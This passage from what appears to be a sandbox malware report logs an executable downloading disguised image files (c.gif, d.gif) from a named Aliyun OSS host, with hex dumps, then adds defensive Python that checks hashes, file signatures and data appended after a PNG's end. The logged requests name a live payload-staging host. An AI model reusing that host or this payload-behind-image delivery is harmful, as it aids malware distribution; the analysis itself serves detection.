                                2025-01-07 03:15:36 UTC4096INData Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d
                                Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                2025-01-07 03:15:36 UTC4096INData Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8
                                Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                2025-01-07 03:15:36 UTC4096INData Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf
                                Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJ


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                3 | 192.168.2.8 | 49711 | 39.103.20.48 | 443 | 7668 | C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2025-01-07 03:15:37 UTC | 111 | OUT | GET /c.gif HTTP/1.1
                                User-Agent: GetData
                                Host: jylhok.oss-cn-beijing.aliyuncs.com
                                Cache-Control: no-cache
                                2025-01-07 03:15:38 UTC | 546 | IN | HTTP/1.1 200 OK
                                Server: AliyunOSS
                                Date: Tue, 07 Jan 2025 03:15:38 GMT
                                Content-Type: image/gif
                                Content-Length: 10681
                                Connection: close
                                x-oss-request-id: 677C9C5A9F27CB3430F36997
                                Accept-Ranges: bytes
                                ETag: "10A818386411EE834D99AE6B7B68BE71"
                                Last-Modified: Mon, 06 Jan 2025 08:35:19 GMT
                                x-oss-object-type: Normal
                                x-oss-hash-crc64ecma: 10287299869673359293
                                x-oss-storage-class: Standard
                                x-oss-ec: 0048-00000104
                                Content-Disposition: attachment
                                x-oss-force-download: true
                                Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                x-oss-server-time: 11
                                2025-01-07 03:15:38 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                2025-01-07 03:15:38 UTC4096INData Raw: 4d cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66
                                Data Ascii: MbZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf
                                2025-01-07 03:15:38 UTC3035INData Raw: 0f 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0
                                Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                4 | 192.168.2.8 | 49712 | 39.103.20.48 | 443 | 7668 | C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2025-01-07 03:15:39 UTC | 111 | OUT | GET /d.gif HTTP/1.1
                                User-Agent: GetData
                                Host: jylhok.oss-cn-beijing.aliyuncs.com
                                Cache-Control: no-cache
                                2025-01-07 03:15:39 UTC | 547 | IN | HTTP/1.1 200 OK
                                Server: AliyunOSS
                                Date: Tue, 07 Jan 2025 03:15:39 GMT
                                Content-Type: image/gif
                                Content-Length: 3892010
                                Connection: close
                                x-oss-request-id: 677C9C5B998B3E3138B653D9
                                Accept-Ranges: bytes
                                ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                Last-Modified: Mon, 06 Jan 2025 08:35:24 GMT
                                x-oss-object-type: Normal
                                x-oss-hash-crc64ecma: 3363616613234190325
                                x-oss-storage-class: Standard
                                x-oss-ec: 0048-00000104
                                Content-Disposition: attachment
                                x-oss-force-download: true
                                Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                x-oss-server-time: 22
                                2025-01-07 03:15:39 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                2025-01-07 03:15:39 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                2025-01-07 03:15:39 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                2025-01-07 03:15:40 UTC4096INData Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95
                                Data Ascii: -J;wuwu{}uG`uWu{Q6
                                2025-01-07 03:15:40 UTC4096INData Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33
                                Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3
                                2025-01-07 03:15:40 UTC4096INData Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50
                                Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
                                2025-01-07 03:15:40 UTC4096INData Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79
                                Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                                2025-01-07 03:15:40 UTC4096INData Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4
                                Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                                2025-01-07 03:15:40 UTC4096INData Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7
                                Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
                                2025-01-07 03:15:40 UTC4096INData Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64
                                Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd
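
                                The three objects above (b.gif, c.gif, d.gif) are served as image/gif, yet each body opens with the same PNG signature, the same IHDR (512x512, 8-bit palette, CRC c3a624c8) and the same 474-byte PLTE, while the Content-Lengths differ (125333, 10681, 3892010 bytes). A shared picture with wildly different sizes is the usual shape of a payload riding behind a real image; whether the remainder is IDAT data or bytes appended after IEND can only be settled by walking the chunk list, which the truncated rows here do not allow. OSS also returns the object MD5 twice, base64 in Content-MD5 and hex in ETag, so a responder can confirm a retrieved copy against the report before analysing it. The Python below is an added example, not code from the report or from the sample: the header values and the 33-byte PNG prefix are copied from the sessions above, the small PNG with an appended payload is constructed here so the chunk walk can be exercised end to end, and the MIME table is an assumption of this example.

```python
"""Consistency checks for the OSS downloads in the report: Content-MD5 vs ETag,
declared Content-Type vs magic bytes, and a PNG chunk walk that measures data
left after IEND (added example; header values copied from the report)."""
import base64
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

# Assumed mapping for this example: magic bytes -> the Content-Type they imply.
MAGICS = [
    (PNG_SIG, "image/png"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"MZ", "application/x-dosexec"),
]


def sniff_mime(body):
    """Type implied by the first bytes, independent of the Content-Type header."""
    for magic, mime in MAGICS:
        if body.startswith(magic):
            return mime
    return "application/octet-stream"


def content_md5_matches_etag(content_md5_b64, etag):
    """OSS sends the object's MD5 base64-encoded in Content-MD5 and hex in ETag;
    agreement confirms the capture and the transfer are intact."""
    digest = base64.b64decode(content_md5_b64)
    return digest.hex().upper() == etag.strip('"').upper()


def parse_ihdr(body):
    """Decode the mandatory first chunk of a PNG."""
    if not body.startswith(PNG_SIG):
        raise ValueError("no PNG signature")
    length, ctype = struct.unpack_from(">I4s", body, 8)
    if ctype != b"IHDR" or length != 13:
        raise ValueError("first chunk is not a 13-byte IHDR")
    width, height, depth, color, comp, filt, interlace = struct.unpack_from(">IIBBBBB", body, 16)
    return {"width": width, "height": height, "bit_depth": depth, "color_type": color,
            "compression": comp, "filter": filt, "interlace": interlace}


def png_trailing_bytes(body):
    """Walk the chunk list to IEND, checking each CRC.  Returns (bytes after IEND,
    problems).  A clean image has 0 trailing bytes; a payload glued behind a real
    picture shows up here as a large positive number."""
    problems = []
    pos = len(PNG_SIG)
    while True:
        if pos + 12 > len(body):
            problems.append("truncated before IEND")
            return 0, problems
        length, ctype = struct.unpack_from(">I4s", body, pos)
        end = pos + 12 + length
        if end > len(body):
            problems.append("%r chunk overruns the file" % ctype)
            return 0, problems
        stored_crc = struct.unpack_from(">I", body, pos + 8 + length)[0]
        if zlib.crc32(body[pos + 4:pos + 8 + length]) != stored_crc:  # CRC covers type + data
            problems.append("bad CRC on %r" % ctype)
        pos = end
        if ctype == b"IEND":
            return len(body) - pos, problems


def _chunk(ctype, data):
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))


def build_png_with_payload(payload):
    """Constructed test input: a valid 2x2 palette PNG with `payload` appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", 2, 2, 8, 3, 0, 0, 0)
    plte = bytes([255, 0, 0, 0, 255, 0, 0, 0, 255])           # three palette entries
    idat = zlib.compress(b"\x00\x00\x01" + b"\x00\x01\x02")   # two rows: filter byte + 2 indices
    return (PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"PLTE", plte)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"") + payload)


def assess_response(content_type, content_md5_b64, etag, body):
    """Red flags for one downloaded object, as a dict."""
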